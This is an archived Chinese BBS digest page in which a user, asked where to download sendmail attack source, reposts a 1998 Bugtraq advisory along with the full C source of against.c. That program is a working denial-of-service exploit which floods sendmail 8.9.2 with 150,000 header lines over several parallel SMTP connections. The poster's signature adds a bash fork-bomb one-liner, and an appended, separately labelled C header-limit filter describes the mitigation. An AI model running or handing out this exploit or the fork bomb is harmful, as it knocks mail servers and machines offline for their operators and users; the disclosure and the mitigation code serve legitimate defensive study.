<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm Best-of Digest Download</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX Network Programming (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">Back to start</a>][<a href="377.htm">Up one level</a>][<a href="386.htm">Next</a>]
<hr><p align="left"><small>From: VRGL (Doing 3D rendering for my graduation project ---- so painful!!!), Board: Security <br>
Subject: Re: Where can I download source code for attacking sendmail <br>
Posting site: BBS 水木清华站 (Sat Aug 5 09:00:49 2000) <br>
<br>
Date: Sat, 12 Dec 1998 19:39:56 +0100 <br>
From: Michal Zalewski <lcamtuf@IDS.PL> <br>
To: BUGTRAQ@netspace.org <br>
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want! <br>
Parts/Attachments: <br>
1 Shown 32 lines Text <br>
2 OK ~2 KB Text, "" <br>
---------------------------------------- <br>
Hello again. Yesterday, I published some rather laconic information about <br>
two bugs in Sendmail up to 8.9.2, and decided to post only short <br>
description of problem + suggested patch (instead of exploit), to give <br>
developers a chance. Unfortunately, I put together information about two <br>
completely different problems in single posting, and it confused a lot of <br>
people. So, to kill any senseless discussions - again: <br>
- The first one was 'redirection attack'; I said you could call it 'bug' <br>
instead of 'feature', but as no one likes anonymous mailbombing, <br>
network overloading / scanning, it's good to apply sendmail.cf patch <br>
included in original posting; without it, your relay could be abused in <br>
many painful ways. And yes, attack has been confirmed with 8.9.2 and <br>
sendmail.cf from 8.9.2 with relaying enabled. I don't think there's <br>
anything left to talk about. Dot. <br>
- The second one was DoS attack during headers parsing - and this is <br>
a bug, *confirmed on 8.9.2*. I included simple patch to source tree. <br>
Unfortunately, all feedback we received from developers was one-line <br>
response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided <br>
not to publish an exploit, but now I realized there's no chance for <br>
response from vendors if there's no real danger. So here it is. <br>
Attached file, against.c, should perform very 'light' attack, only <br>
for testing purposes. If you noticed increased LA during attack, <br>
your machine is vulnerable. You had enough time to patch your system <br>
- don't blame me, but vendors. EOF. <br>
_______________________________________________________________________ <br>
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM] <br>
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};: <br>
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813] <br>
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] <br>
------------------------------snip here---------------------------------- <br>
/* <br>
against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2) <br>
(c) 1999 by <marchew@linux.lepszy.od.kobiety.pl> <br>
Usage: ./against existing_user_on_victim_host victim_host <br>
Example: ./against nobody lamers.net <br>
*/ <br>
#include <stdio.h> <br>
#include <unistd.h> <br>
#include <sys/param.h> <br>
#include <sys/socket.h> <br>
#include <sys/time.h> <br>
#include <netinet/in.h> <br>
#include <netdb.h> <br>
#include <stdarg.h> <br>
#include <errno.h> <br>
#include <signal.h> <br>
#include <getopt.h> <br>
#include <stdlib.h> <br>
#include <string.h> <br>
#define MAXCONN 5 <br>
#define LINES 150000 <br>
struct hostent *hp; <br>
struct sockaddr_in s; <br>
int suck,loop,x; <br>
int main(int argc,char* argv[]) { <br>
<br>
<br>
printf("against.c - another Sendmail DoS (up to 8.9.2)\n"); <br>
if (argc-3) { <br>
printf("Usage: %s victim_user victim_host\n",argv[0]); <br>
exit(0); <br>
} <br>
<br>
hp=gethostbyname(argv[2]); <br>
<br>
if (!hp) { <br>
perror("gethostbyname"); <br>
exit(1); <br>
} <br>
fprintf(stderr,"Doing mess: "); <br>
for (;loop<MAXCONN;loop++) if (!(x=fork())) { <br>
FILE* d; <br>
bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length); <br>
s.sin_family=hp->h_addrtype; <br>
s.sin_port=htons(25); <br>
if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket"); <br>
if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect"); <br>
if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); } <br>
usleep(100000); <br>
fprintf(d,"helo tweety\n"); <br>
fprintf(d,"mail from: tweety@polbox.com\n"); <br>
fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]); <br>
fprintf(d,"data\n"); <br>
usleep(100000); <br>
for(loop=0;loop<LINES;loop++) { <br>
if (!(loop%100)) fprintf(stderr,"."); <br>
fprintf(d,"To: x\n"); <br>
} <br>
fprintf(d,"\n\n\nsomedata\n\n\n"); <br>
fprintf(d,".\n"); <br>
sleep(1); <br>
fprintf(d,"quit\n"); <br>
fflush(d); <br>
sleep(100); <br>
shutdown(suck,2); <br>
close(suck); <br>
exit(0); <br>
} <br>
waitpid(x,&loop,0); <br>
fprintf(stderr,"ok\n"); <br>
return 0; <br>
} <br>
<br>
【 In the post by volkswagon (The Weeping One): 】 <br>
: As in the subject line <br>
<br>
<br>
-- <br>
</small><hr>
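<p align="left">Added example (not part of the original post and not Sendmail code): a streaming guard, of the kind a mail filter in front of an MTA could apply, that caps header lines and total header bytes in an SMTP DATA stream, which is the mitigation for the header-parsing DoS described above. The limits, type names and function names are assumptions of this example.</p>

```c
#include <stddef.h>
#include <string.h>

/* Assumed limits for this example; set them from local mail policy. */
#define MAX_HEADER_BYTES 32768
#define MAX_HEADER_LINES 1000

enum hdr_verdict { HDR_OK, HDR_TOO_MANY_LINES, HDR_TOO_MANY_BYTES };

struct hdr_guard {
    size_t bytes, lines;      /* header bytes / physical lines seen so far */
    int at_bol, in_body;      /* at beginning of line; blank separator seen */
    enum hdr_verdict verdict; /* sticky once a limit is exceeded */
};

void hdr_guard_init(struct hdr_guard *g)
{
    memset(g, 0, sizeof *g);
    g->at_bol = 1;
}

/* Feed one chunk of the DATA stream; counting stops at the blank line
   that ends the headers, so the body size is not limited here. */
enum hdr_verdict hdr_guard_feed(struct hdr_guard *g, const char *buf, size_t len)
{
    for (size_t i = 0; i < len && !g->in_body && g->verdict == HDR_OK; i++) {
        if (++g->bytes > MAX_HEADER_BYTES) {
            g->verdict = HDR_TOO_MANY_BYTES;
        } else if (buf[i] == '\n') {
            if (g->at_bol)
                g->in_body = 1;          /* empty line: headers are over */
            else if (++g->lines > MAX_HEADER_LINES)
                g->verdict = HDR_TOO_MANY_LINES;
            g->at_bol = 1;
        } else if (buf[i] != '\r') {     /* CR of a CRLF does not start a line */
            g->at_bol = 0;
        }
    }
    return g->verdict;
}

/* Constructed input: n copies of one short header line, then a small body. */
enum hdr_verdict check_repeated_header(size_t n)
{
    struct hdr_guard g;
    hdr_guard_init(&g);
    for (size_t i = 0; i < n && hdr_guard_feed(&g, "To: x\n", 6) == HDR_OK; i++) { }
    return hdr_guard_feed(&g, "\nbody\n", 6);
}
```

<p align="left">Once the verdict is not HDR_OK the filter can reject the message and stop buffering, so the cost per connection stays bounded regardless of how many header lines the client sends.</p>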
<p align="center"><a href="http://cterm.163.net">Welcome to the Cterm home page</a></p>
</table>
</body>
</html>